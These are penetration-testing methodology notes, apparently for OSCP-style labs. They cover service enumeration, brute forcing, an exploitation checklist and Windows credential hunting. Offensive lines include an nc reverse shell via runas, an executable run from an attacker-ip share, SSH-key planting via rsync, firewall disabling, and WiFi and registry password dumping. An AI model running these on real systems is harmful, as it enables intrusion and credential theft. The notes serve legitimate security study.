# Table of Contents - [Enumeration | Methodology](#enumeration-methodology) - [Web Enumeration | Methodology](#web-enumeration-methodology) - [LDAP Enumeration | Methodology](#ldap-enumeration-methodology) - [Rsync Enumeration | Methodology](#rsync-enumeration-methodology) - [SNMP Enumeration | Methodology](#snmp-enumeration-methodology) - [SMB Enumeration | Methodology](#smb-enumeration-methodology) - [Bullet Proof Strategy | Methodology](#bullet-proof-strategy-methodology) - [πŸ‘πŸ—¨ Enumeration Cheatsheet | Methodology](#-enumeration-cheatsheet-methodology) - [Exploitation | Methodology](#exploitation-methodology) - [Copy of SMBPass Change | Methodology](#copy-of-smbpass-change-methodology) - [Enumerating Patterns Trick | Methodology](#enumerating-patterns-trick-methodology) - [RPC Enumeration | Methodology](#rpc-enumeration-methodology) - [Kerberos Enumeration | Methodology](#kerberos-enumeration-methodology) --- # Enumeration | Methodology [PreviousBullet Proof Strategy](/methodology/readme/bullet-proof-strategy) [NextπŸ‘πŸ—¨ Enumeration Cheatsheet](/methodology/readme/enumeration/enumeration-cheatsheet) Last updated 2 years ago πŸ˜ƒ πŸ‘οΈ [πŸ‘οΈβ€πŸ—¨οΈπŸ‘πŸ—¨ Enumeration Cheatsheet](/methodology/readme/enumeration/enumeration-cheatsheet) [SNMP Enumeration](/methodology/readme/enumeration/snmp-enumeration) [IRC Enumeration](/methodology/readme/enumeration/irc-enumeration) [LDAP Enumeration](/methodology/readme/enumeration/ldap-enumeration) [RPC Enumeration](/methodology/readme/enumeration/rpc-enumeration) [DNS Enumeration](/methodology/readme/enumeration/dns-enumeration) [Rsync Enumeration](/methodology/readme/enumeration/rsync-enumeration) [IDENT Enumeration](/methodology/readme/enumeration/ident-enumeration) [SMB Enumeration](/methodology/readme/enumeration/smb-enumeration) [Web Enumeration](/methodology/readme/enumeration/web-enumeration) [Kerberos Enumeration](/methodology/readme/enumeration/kerberos-enumeration) ![Page cover image](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2Fmedia2.giphy.com%2Fmedia%2F8qXJTU5oEhQZO%2F200.gif&width=1248&dpr=4&quality=100&sign=84a80d8a&sv=2) --- # Web Enumeration | Methodology [PreviousCopy of SMBPass Change](/methodology/readme/enumeration/smb-enumeration/copy-of-smbpass-change) [NextMethodology](/methodology/readme/enumeration/web-enumeration/methodology) Last updated 2 years ago ### [](#cheatsheet) CheatSHEET Use exiftool on pngs and documents that might give you a hint on the owner. ### [](#directory-busting) Directory Busting #### [](#iis-applications) IIS Applications Copy wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.10.10.103:80/FUZZ πŸ˜ƒ πŸ‘οΈ [Manh-Dung Nguyen - OSCP Enumeration](https://strongcourage.github.io/2020/05/03/enum.html) [![Logo](https://2702523092-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/spaces%2F-M7fpUiYyw8_p6n2INMN%2Favatar-1589873610780.png?generation=1589873611085971&alt=media)Enumeration checklistOSCP Notes](https://fareedfauzi.gitbook.io/oscp-notes/services-enumeration/http-s/enumeration-checklist) [![Logo](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Favatar.png?generation=1572891120130012&alt=media)80,443 - Pentesting Web MethodologyHackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web) --- # LDAP Enumeration | Methodology EXAMINE EVERYTHING FABIAN, LOOK AT WEIRD Fields that have been added for users. !!! Try to grep the following just in case but if it doesnt work look through the output! Copy nmap -n -sV --script "ldap* and not brute" -p389,3268 192.168.105.122 Null bind ldapsearch -H ldap://10.128.2.21:389/ -x -b '' -W "objectclass=*" ldapsearch -x -H 'ldap://192.168.105.122:389' -D '' -w '' -b "DC=hutch,DC=offsec" rerun the same command and run it with | grep description sometimes they have interesting things. ldapsearch -x -H 'ldap://10.10.10.182:389' -D '' -w '' -b "DC=cascade,DC=local" | grep Pwd ldapsearch -x -H 'ldap://10.10.10.182:389' -D '' -w '' -b "DC=cascade,DC=local" | grep pwd ldapsearch -x -H 'ldap://10.10.10.182:389' -D '' -w '' -b "DC=cascade,DC=local" | grep password ldapsearch -x -H 'ldap://10.10.10.182:389' -D '' -w '' -b "DC=cascade,DC=local" | grep Pass ldapsearch -x -H 'ldap://10.10.10.182:389' -D '' -w '' -b "DC=cascade,DC=local" | grep pass This command is to make a list of existing users. Copy ldapsearch -x -H 'ldap://10.10.10.172:389' -D '' -w '' -b "DC=MEGABANK,DC=LOCAL" | grep sAMAccountName | tr -d ':' | sed 's/s//' | sed 's/A//' | sed 's/M//' | sed 's/A//'| sed 's/c//' | sed 's/c//'| sed 's/o//' | sed 's/u//' | sed 's/n//'| sed 's/t//' | sed 's/N//'| sed 's/a//' | sed 's/m//' | sed 's/e//' > ldapusers.txt #### [](#authenticated) Authenticated Copy ldapsearch -H ldap://10.10.10.248 -x -W -D "Ted.Graves@intelligence.htb" -b "dc=intelligence,dc=htb" We could make a new directory and use this command and host a python webserver. Copy ldapdomaindump -u 'htb.local\amanda' -p 'Ashare1972' 10.10.10.103 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished Use the following command to easily naviaget to the use descriptions └─# cat domain_users.grep | cut -d " " -f12 | grep "\S" If a group is part of the Remote management Group, it means we can log in via winrm. [PreviousIRC Enumeration](/methodology/readme/enumeration/irc-enumeration) [NextRPC Enumeration](/methodology/readme/enumeration/rpc-enumeration) Last updated 2 years ago πŸ˜ƒ πŸ‘οΈ --- # Rsync Enumeration | Methodology [PreviousDNS Enumeration](/methodology/readme/enumeration/dns-enumeration) [NextIDENT Enumeration](/methodology/readme/enumeration/ident-enumeration) Last updated 2 years ago The first thing we do is follow this guide: Copy nc -vn 127.0.0.1 873 (UNKNOWN) [127.0.0.1] 873 (rsync) open @RSYNCD: 31.0 <--- You receive this banner with the version from the server @RSYNCD: 31.0 <--- Then you send the same info #list <--- Then you ask the sever to list raidroot <--- The server starts enumerating USBCopy NAS_Public _NAS_Recycle_TOSRAID <--- Enumeration finished @RSYNCD: EXIT <--- Sever closes the connection #Now lets try to enumerate "raidroot" nc -vn 127.0.0.1 873 (UNKNOWN) [127.0.0.1] 873 (rsync) open @RSYNCD: 31.0 @RSYNCD: 31.0 raidroot @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password If after we try to list a share and there is just an OK. It means it isn't password protected which means we can freely list and upload files to the share. To list the share: Copy rsync -av --list-only rsync://192.168.0.123/shared_name To download the share: Copy rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared If we have credentials: Copy rsync -av --list-only rsync://username@192.168.0.123/shared_name rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared Take into account situational awareness, in the case of the machine fail, we were placed in a home folder for a user. So we can copy our own public key and paste the contents to an authorized\_keys file and transfer it using rsync. Copy rsync -av blah/.ssh/authorized_keys rsync://username@192.168.0.123/home_user/.ssh Change the permissions of the id\_rsa.pub key that we generated to 400 and we can ssh in. πŸ˜ƒ πŸ‘οΈ [![Logo](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Favatar.png?generation=1572891120130012&alt=media)873 - Pentesting RsyncHackTricks](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync) --- # SNMP Enumeration | Methodology [PreviousπŸ‘πŸ—¨ Enumeration Cheatsheet](/methodology/readme/enumeration/enumeration-cheatsheet) [NextIRC Enumeration](/methodology/readme/enumeration/irc-enumeration) Last updated 2 years ago SNMP Enumeration is crucial because using different commands one can determine the networking interfaces, version, and other useful information that can easily be exploited. Useful Command: **snmp-check ** This command was really useful, in ClamAV from Proving Grounds, the snmp-check command allowed us to check for the running ClamAV service running on the computer which allowed us to exploit it. Example of SNMP Exploitation[](#example-of-snmp-exploitation) (ClamAV PG) πŸ˜ƒ πŸ‘οΈ Notice the different information that is provided to us. ![](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2F3418038199-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FyTPWZkKJbJfX8uHiRzmn%252Fuploads%252FFPQqPqnwsQ5IxsBrfgy9%252F2022-07-06_00-58.png%3Falt%3Dmedia%26token%3Defd004dd-28c7-4ec2-acb5-8effae246edb&width=768&dpr=4&quality=100&sign=424b3114&sv=2) ![](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2F3418038199-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FyTPWZkKJbJfX8uHiRzmn%252Fuploads%252Fo9R4t2wycz9vNNOYrG39%252F2022-07-06_00-40.png%3Falt%3Dmedia%26token%3De513914b-44e0-4651-b713-a62d2f192c4f&width=768&dpr=4&quality=100&sign=da976588&sv=2) [https://app.gitbook.com/s/wHYOvbdHNwGOuZd2n6gr/](https://lyethar.gitbook.io/clamav/) --- # SMB Enumeration | Methodology ### [](#version-check) Version Check Copy use auxiliary/scanner/smb/smb_version ### [](#list) List Copy smbclient --no-pass -L // # Null user smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash smbmap -H [-P ] #Null user smbmap -u "username" -p "password" -H [-P ] #Creds smbmap -u "username" -p ":" -H [-P ] #Pass-the-Hash crackmapexec smb -u '' -p '' --shares #Null user crackmapexec smb -u 'username' -p 'password' --shares #Guest user crackmapexec smb -u 'username' -H '' --shares #Guest user ### [](#connect) Connect Copy #Connect using smbclient smbclient --no-pass /// smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash #Use --no-pass -c 'recurse;ls' to list recursively with smbclient #List with smbmap, without folder it list everything smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive list smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash ### [](#mount-them-to-see-if-we-have-write-access-to-them) Mount them to see if we have write access to them Copy mount -t cifs //10.10.10.103/'Department Shares'/ /home/kali/Sizzle/results/mount So in order to enumerate permissions within these folders to see which we would have access to write and maybe we can put some sort of malicious files such as .hta, .scf, or any other based on the software that the company might seem to have. Copy tput civis; for directory in $(ls); do echo -e "\n [*] Enumerating Permissions in the $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done; tput cnorm So edit accordingy, the script basically says that within the items in the command ls, we will run the smbcacls command. To see who has write permissions. ### [](#brute-force) Brute Force Copy nmap --script smb-brute -p 445 hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/best15.txt 10.130.40.70 smb -t 1 crackmapexec smb 10.129.155.73 -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/seclists/Passwords/darkweb2017-top100.txt Copy nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name [PreviousIDENT Enumeration](/methodology/readme/enumeration/ident-enumeration) [NextCopy of SMBPass Change](/methodology/readme/enumeration/smb-enumeration/copy-of-smbpass-change) Last updated 2 years ago By using the command tree we can easily list the files inside the directory although we would already know this with autrecon. πŸ˜ƒ πŸ‘οΈ ![](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2F3418038199-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FyTPWZkKJbJfX8uHiRzmn%252Fuploads%252FpKcDZstTdHlehwxoCcQT%252F2022-08-11_13-03.png%3Falt%3Dmedia%26token%3D5d44f269-3761-49f1-90dc-1808c31da5c2&width=300&dpr=4&quality=100&sign=f317be72&sv=2) ![](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2F3418038199-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FyTPWZkKJbJfX8uHiRzmn%252Fuploads%252FAQri0ulnEqlxhIcWq5KL%252F2022-08-11_13-12.png%3Falt%3Dmedia%26token%3D2c5cfae2-ae84-4d41-9e5e-1e3280e3928e&width=300&dpr=4&quality=100&sign=4a2f6684&sv=2) --- # Bullet Proof Strategy | Methodology [PreviousWelcome](/methodology) [NextEnumeration](/methodology/readme/enumeration) Last updated 2 years ago ### [](#proofs) Proofs Linux Copy hostname && whoami && cat proof.txt && ip a Windows Copy hostname && whoami.exe && type proof.txt && ipconfig /all ### [](#enumeration) Enumeration #### [](#service-enumeration) Service Enumeration * Run autorecon * Run rustscan * MAKE A LIST OF EVERY ENTRY POINT. * Start Enumerating Non-Web Services * For every port remember the principles of: * Checking Version: * Grab banner using netcat or telnet * Search notes * Cherry Tree * This Blog * Hacktricks * Searchsploit search * What is the purpose of this service? * Can we change password , users from other services around? * Can we modify information * can we read information ? * Can we decrypt it? * Default credentials? * Brute force the service * Use nse scripts or maybe anyting. * Any known vulnerability? * * * * Check on google Copy site:github.com *Service version.release* * version + github + exploit search * google search * Every error message * Every PATH * Every parameter to find version * Every version of exploitdb * Every version of vuln * Every string from the banner grab * Kerberos open? * kerbrute user enum * Aseproast * SNMP * nmap * snmpwalk * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * Check running services * Google! * SMTP * NMAP * Hacktricks * USERENUM * HYDRA SMTP ENUM * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * DNS * autrecon manual * nslookup * dig axfr * IRC * hexchat * POP3 * See if we can authenticate as a user * "LIST" * retr * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * Ident * Channel through different ports each time * ident-user-enum * Enumerate Services with Null Sessions * LDAP * Grep Description * Look for unusual fields * Grep pwd * Grep Pwd * grep password * grep Pass * grep pass * ldapsearch * FTP * if unstable reset box * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * upload? * Identify where we are in the file system * Dont know?google! * Example /var/ftp/anon/ * Download recursively all ftp directories using wget * Change binary mode to upload exe * * Configuration files * ftpusers * ftp.conf * proftpd.conf * filezilla users.xml * RPC * enumdomusers * make a list of users * enumprinters * SMB * Download Files * Mount * Check for permissions smbcacls * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * REDIS * Check HACKTRICKS * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * DBS * Try PHP webshell if we have write access to the /var/www/html/ folder * Try grabbing SSH Keys or uploading them * Try uploading module.so if vulnerable version * Rsync * List shares * Download Share * Identify Where we are * If we do not know how to enumerate these services use hacktricks * Identifying default credentials and password reusage: * Look up Version plus default credentials * Try admin:admin * Try admin:password * Try root:admin * Try root:password * Try root:root * Try boxname:admin,password * Try version or app name : app name * Try admin : no pass * Try root : no pass * Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret) * Brute force * Use cewl to make a passlist if there is a webserver running * Use rockyou.txt if we know that there are users such as admin or root for those services * If we found credentials * Rerun the bruteforcing * If we are able to find credentials through our enumeration then we rerun our enumeration * This mean that we will run every null session command with the credentials that we found or we will attempt EVERY vector with the credentials * LDAP * RPC * SMB * Download Files * Mount * Check upload permissions using smbcalcls * scf * hta * odt * If SMBPass Change was given to you use smbpasswd * REDIS * Enumerate version * DBS * Try PHP webshell if we have write access to the /var/www/html/ folder * Try grabbing SSH Keys or uploading them * Try uploading module.so if vulnerable version * Kerberos based attacks * Kerberoasting * CME * WINRM * SMB * If SMBPass Change was given to you use smbpasswd * LDAP * ldapdomaindump * redo the same shit from initial time * Files of importance when looking out for this shares * Regardless NO MATTER WHAT YOU FIND YOU WILL LOOK IT UP ON GOOGLE! * * pdfs * exiftool * Credentials for mysql, postgress, mssql * Look for string "sa" * exe * buffer overflow * pngs * exiftool * conf * config * xml * Look for the file specifically on google.com and how to decrypt them * Groups.xml * gpp decrypt * VNC * vncpwd * db * sqlite * cert files for evil winrm * pfx files for evil winrm * zip * zip2john * 7z * 7z2john * pdf * pdfcrack * Doc * office2john * .net file * dnspy #### [](#web-enumeration) Web Enumeration * autorecon * Rustscan * Check for potential auth owner * Take note of the app * node.js * werkzeug * IIS * nikto scan * HTTPS * Look at certificates, check brainfuck for this * sslscan * nmap heatbleed vuln * If there is proxy * use spose to enumerate behind the proxy * Navigate to site * Source Code inspection * Look for APIs * href * check comments * Hidden values * Weird Code * Passwords * Download Files * Exiftool * Enumerate version of CMS, about page, versions * Searchsploit * Find service and version * Find known service bugs * Find configuration issues * Run nmap port scan / banner grabbing * Google-Fu * Every error message * Every URL path * Every paramenter to find versions/apps/bugs * searchsploit every serivce * Google * Every version exploit db * Every version vulnerability * Google * If Versions were identified such as * Wordpress * wpscan * Check plugins for vulnerabiliies * wpscan brute * Droopal * Droopescan * Check changelog.txt for version * Find endpoint\_path * Attack vectors * Drupal 7.x Module Services Rce * Drupalgeddon2 * DRUPALGEDDON3 * Jenkins * Default Creds * Create new User * Identify version and exploits for them * Groovy Script reverse shell * Create new job * If we can build * Else use curl or cronjob method to execute the commands * Try to get reverse shell * Otherwise hunt down for the master.key and other files needed for decryption * Tomcat * Nikto scan * Search vulnerabilities via version number * Look for /manager * Use default credential list * Upload war file to get reverse shell * WebDav * Default Creds * Spray * Other Creds * Use cadaver for upload * aspx * phpMyAdmin * Try Default Creds * root: * root:password * Once in we can upload a shell using a sql query * Enumerate for usernames, emails, user info * Make a userlist using username-anarchy and other tool * Use these against any service or authentication method. * Make a passlist out of cewl * username:username * username:password * Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret) * Enumerate for Upload * Enumerate what extentions we can use to upload * Pair this with FTP, REDIS, and other forms of upload capability. AT THIS POINT THIS IS WHERE IT MATTERS TO TAKE INTO ACCOUNT WHAT THE VERSION AND TECHNOLOGY BEHIND THE APPLICATION IS, IF THERE IS NO IDENTIFABLE EXPLOIT THAT MEANS THAT THIS IS A WEBSITE MADE BY THE CREATORS OF THE BOX. WE HAVE TO TAKE INTO ACCOUNT NOW THAT WE COULD POSSIBLY HAVE SQLI, CODE INJECTION. OUR PAYLOADS HAVE TO MATCH THE TECHNOLOGY BEHIND THE WEBSITE. * Logical reasoning * Look at the application from a bad guy perspective, what does it do? what is the most valuable part? Some applications will value things more than others, for example a premium website might be more concerned about users being able to bypass the pay wall than they are of say cross-site scripting * Look at the application logic too, how is business conducted? * 401 OR 403? Try bypassing that * Use hacktricks for this, I also have a script that does it for you. * nikto * google everything that this returns * there was a box about the api that was exploitable by looking it up on nikto scan (Restack API) * Enumerate directories * dirsearch * /boxname/ * gobuster * if cgi-bin folder was found (shellshock) * /cgi-bin/ dirb scan * dirb scan normal * Rerun initial enum for this such as source code inspection * Enumerate hidden params * arjun * wfuzz * ffuff * Guess parameters. If there's a POST forgot\_pass.php with an email param, try `GET /forgot_pass.php?email=%0aid.` * Enumerate parameters for RFI, and LFI * Remember relativity and using LFI to expose other services that we could authenticate as. * * Check for RCE methods, like every single one of them. * Enumerate SSRF if there is some sort of browser. * Capture hashes via responder * Every parameter or input has to be checked for sql injection * Try enabling the shells depending on the database that is open * otherwise haha xd try to enumerate tables and the whole jargon * Play with post and get requests, this could lead to something displaying * Google everything * This can be done with curl and BurpSuite * Guess post parameters based on the output, check the werkzeug section of the blog * Play with weak cookies and parameters * Look for weak encryption maybe we could decrypt these into passwords and mess with them by changing them to admin. * Log in forms * default creds google * cewl to make passlist * cewl to make user list * version:version * combine them both * authetication bypass * boxname:boxname * admin:version * name:version * php type juggling * Credentials somewhere else in the box. * Bruteforce ### [](#exploitation) Exploitation THESE ARE THE THREE PRINCIPLES OF GETTING IN. THERE IS EITHER A VULNERABLE SERVICE, THIS MAYBE HAS TO BE CHAINED WITH ANOTHER VULNERABILITY. THEN THERE IS PASSWORD SPRAYING, THIS IS BASICALLY CONSITUTES TO DEFAULT CREDS, PASSWORD RESUSAGE, AND THE LAST IS BRUTEFORCING #### [](#vulnerable-services) Vulnerable services Any known vulnerability? * * * * Check on google Copy site:github.com *Service version.release* * We do not have version? But exploits avaliable * Prioritize RCE exploits * Try THEM ALL!!! * and redo the above * IF WE HAVE CODE EXECUTION * Attempt to get reverse shells * if a technique does not work, do every single fucking reverse shell * * Troubleshoot the exploit maybe the command needs a certain syntax look at the methodology section of the blog in exploitation * Also play with this remember the mongodb exploit from the labs. * Also try bash -c instead of just the normal bash -i reverse shell. * ALWAYS USE AND CHANNEL THROUGH OPEN PORTS FOR THE REVERSE SHELL * if we do get code execution but no reverse shell because of whatever firewall, our best choice is to look if we can output files in a way where we can use them against other services, these could be used to gain access and uploading shit. * THINK ABOUT SITUATIONAL AWARENESS. Where can we upload? can we use these files to our advantage, remember the thing about redis. * Did we get credentials for any database that are valid ? * Check RCE methods * Enumerate the database #### [](#active-directory-based-attacks) Active Directory Based Attacks * If base * d on our enumeration we found some sort of userlist * Make a list with these with different naming conventions * Validate these users with kerbrute. * If the users are valid * ASEPROAST * Make a passlist with how we usually do * use cewl if there is a webserver * user:user * user:password * user:'' * user:boxname * Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret) * Validate these creds with CRackmapexec * ldap * smb * If we get pwned! * psexec * winrm * However Rerun all enumeration from before if we find these are valid * Kebroast #### [](#password-reusage) Password Reusage #### [](#spraying) Spraying Same principle as other things discussed, we make a list out of everything we see and every username, name, version is valuable to us. ### [](#privilege-escalation) Privilege Escalation #### [](#windows) Windows * Enumerate current user and its permissions * Check the privileges * Impersoante * SeLoadDriver * SeRestore Copy SeImpersonatePrivilege SeAssignPrimaryPrivilege SeTcbPrivilege SeBackupPrivilege SeRestorePrivilege SeCreateTokenPrivilege SeLoadDriverPrivilege SeTakeOwnershipPrivilege SeDebugPrivilege * Transfer winpeas * Transfer PowerUp * Seatbelt * Sherlock * Rubeus * SharpHound * General users enum Copy whoami /all net users %username% net users Get-WmiObject -Class Win32\_UserAccount Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\\Users -Force | select Name Get-LocalGroupMember Administrators | ft Name, PrincipalSource * General groups enum Copy net localgroup net localgroup Administrators * Check if current user has these tokens: Copy SeImpersonatePrivilege SeAssignPrimaryPrivilege SeTcbPrivilege SeBackupPrivilege SeRestorePrivilege SeCreateTokenPrivilege SeLoadDriverPrivilege SeTakeOwnershipPrivilege SeDebugPrivilege #### [](#system-enumeration) System Enumeration * Windows version Copy systeminfo | findstr /B /C:"OS Name" /C:"OS Version" * Installed patches and updates Copy wmic qfe * Architecture Copy wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% * Environment variables Copy set Get-ChildItem Env: | ft Key,Value * Drives Copy wmic logicaldisk get caption || fsutil fsinfo drives wmic logicaldisk get caption,description,providername Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\\FileSystem"}| ft Name,Root #### [](#network-enumeration) Network Enumeration ARE THE RUNNIGN SERVICES RUNNING AS OTHER USERS? CAN WE MODIFY THE WEBSTE MAYBE BY PASTING A PHP FILE THAT RUNS AS THE USER WHO HOSTS THE WEBSITE TRANSFER PLINK * List all NICs, IP and DNS Copy ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft * List routing table Copy route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex * List ARP table Copy arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State * List current connections Copy netstat -ano * List current connections correlated to running service (requires elevated privs) Copy netstat -bona * List firewall state and config Copy netsh advfirewall firewall dump netsh firewall show state netsh firewall show config * List firewall's blocked ports Copy $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports * Disable firewall Copy netsh advfirewall set allprofiles state off netsh firewall set opmode disable * List network shares Copy net share powershell Find-DomainShare -ComputerDomain domain.local * SNMP config Copy reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP /s Get-ChildItem -path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\SNMP -Recurse #### [](#credential-access) Credential Access * Go from **medium mandatory level** to **high mandatory level** Copy # using powershell powershell.exe Start-Process cmd.exe -Verb runAs * **TRY KNOWN PASSWORDS!** Copy # check also with runas C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" * Creds from config files (Try different words e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth): Copy dir /s /b /p *pass* == *cred* == *vnc* == *.config* == *conf* == *ini* findstr /si /m password *.xml *.ini *.txt * Creds from local DBs * Creds from Windows Vault Copy cmdkey /list # if found runas /savecred /user:WORKGROUP\Administrator "\\attacker-ip\SHARE\welcome.exe" * Creds from Registry Copy reg query HKLM /f pass /t REG_SZ /s reg query HKCU /f pass /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s # Windows Autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" # SNMP parameters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty credentials reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\ # VNC credentials reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4" /v password ## OpenSSH credentials reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys * Creds from Unattend or Sysprep Files Copy c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattend*.xml %WINDIR%\Panther\Unattend*.xml * Creds from Log Files Copy dir /s /b /p *access*.log* == *.log * Creds from IIS web config Copy Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config C:\inetpub\wwwroot\web.config * Check other possible interesting files Copy dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b %SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\iis6.log %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts C:\ProgramData\Configs\* C:\Program Files\Windows PowerShell\*vnc.ini, ultravnc.ini, \*vnc\* web.config php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP) SiteList.xml #McAfee ConsoleHost_history.txt #PS-History *.gpg *.pgp *config*.php elasticsearch.y*ml kibana.y*ml *.p12 *.der *.csr *.cer known_hosts id_rsa id_dsa *.ovpn anaconda-ks.cfg hostapd.conf rsyncd.conf cesi.conf supervisord.conf tomcat-users.xml *.kdbx KeePass.config Ntds.dit SAM SYSTEM FreeSSHDservice.ini access.log error.log server.xml setupinfo setupinfo.bak key3.db #Firefox key4.db #Firefox places.sqlite #Firefox "Login Data" #Chrome Cookies #Chrome Bookmarks #Chrome History #Chrome TypedURLsTime #IE TypedURLs #IE * Creds from WiFi Copy # 1. Find AP SSID netsh wlan show profile # 2. Get cleartext password netsh wlan show profile key=clear # OR # Go hard and grab 'em all cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on * Creds from sticky notes app Copy C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite * Creds stored in services Copy # SessionGopher to grab PuTTY, WinSCP, FileZilla, SuperPuTTY, RDP # https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -AllDomain -o Invoke-SessionGopher -AllDomain -u domain.com\adm\-arvanaghi 